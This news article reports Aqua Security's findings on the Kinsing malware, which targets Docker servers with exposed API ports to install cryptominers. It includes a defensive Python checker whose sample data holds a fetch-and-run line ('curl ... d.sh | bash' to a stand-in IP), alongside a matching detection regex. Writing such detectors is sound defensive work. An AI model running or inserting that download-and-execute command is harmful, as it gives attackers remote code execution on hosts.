
Kinsing Malware Actively Targeting Docker Servers With Exposed API Ports

by Abeerah Hashim

Researchers have found a malware operation in the wild targeting Docker servers. Dubbed Kinsing, the malware is actively targeting Docker servers with exposed API ports.

Kinsing Malware Targeting Docker Servers

Reportedly, the security team from Aqua Security has found an active malware campaign targeting Docker servers. As elaborated in their blog post, the malware, dubbed Kinsing, is targeting Docker servers with exposed APIs in the wild. This allows the attackers to install cryptominers and use the infected servers to spread the infection further.

As stated by the researchers,

The attackers exploit a misconfigured Docker API port to run an Ubuntu container with the kinsing malicious malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers and hosts.

While the detailed technical analysis of the attack is available in the researchers’ post, here is a brief summary.

The attack begins when the attackers detect an unprotected, open Docker API port. They then instantiate an Ubuntu container whose entry point downloads a shell script, d.sh, from any of three IP addresses under their control. This shell script performs various activities that facilitate the execution of the malware, and it also downloads and runs the Kinsing malware itself.

This malware has several C&C servers, each dedicated to a separate operation. Though the main aim of the malware is to deploy a cryptominer (kdevtmpfsi), it also performs other activities, such as lateral movement to target other systems.

Infection Campaign Going Around For Months

According to Aqua, the Kinsing campaign has been active for months, targeting misconfigured, open Docker daemon API ports. Almost every day, the researchers could observe thousands of such attempts.

Researchers advise companies to ensure the security of all their API ports whilst reviewing their Docker instances. Companies can place exposed admin endpoints behind firewalls or VPNs, and should disable them when not in use.
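As an added illustration of the review the researchers recommend (this is example code, not Aqua Security's or the article's own), the following Python checks two things a defender would look at on a Docker host: whether daemon.json exposes the API on plain TCP without TLS, and whether any container's entry point fetches a shell script from a bare IP address, as the d.sh stage described above does. The daemon.json, the `docker inspect` output and the IP 203.0.113.10 are constructed samples, not values from the report.

```python
import json
import re

# Constructed sample daemon.json: the API is bound to plain TCP with no TLS,
# the misconfiguration Kinsing's operators look for.
DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed sample in the shape of `docker inspect` output: one ordinary
# container and one Ubuntu container whose command pulls a .sh from a raw IP.
INSPECT_JSON = """[
 {"Id": "aaa", "Name": "/pipeline",
  "Config": {"Image": "python:3", "Entrypoint": null, "Cmd": ["python", "app.py"]}},
 {"Id": "bbb", "Name": "/tender_hopper",
  "Config": {"Image": "ubuntu", "Entrypoint": ["/bin/bash", "-c"],
             "Cmd": ["apt-get install -y curl; curl -s http://203.0.113.10/d.sh | bash"]}}
]"""


def daemon_api_exposed(daemon_json: str) -> list:
    """Return TCP listeners from daemon.json that are not protected by client-cert TLS."""
    cfg = json.loads(daemon_json)
    tls_on = cfg.get("tlsverify") is True  # daemon requires client certificates
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://") and not tls_on]


# curl/wget fetching an http(s) URL whose host is a bare IPv4 address and whose path ends in .sh
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^;|&]*https?://\d{1,3}(?:\.\d{1,3}){3}\S*\.sh")


def suspicious_containers(inspect_json: str) -> list:
    """Return names of containers whose entrypoint/cmd downloads a .sh from a raw IP."""
    hits = []
    for container in json.loads(inspect_json):
        cfg = container["Config"]
        # Entrypoint and Cmd may each be null; join them into one command line.
        cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
        if FETCH_RE.search(cmdline):
            hits.append(container["Name"].lstrip("/"))
    return hits


if __name__ == "__main__":
    print("exposed API listeners:", daemon_api_exposed(DAEMON_JSON))
    print("suspicious containers:", suspicious_containers(INSPECT_JSON))
```

On a live host the same functions can be fed `/etc/docker/daemon.json` and the output of `docker inspect $(docker ps -aq)`.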

Let us know your thoughts in the comments.
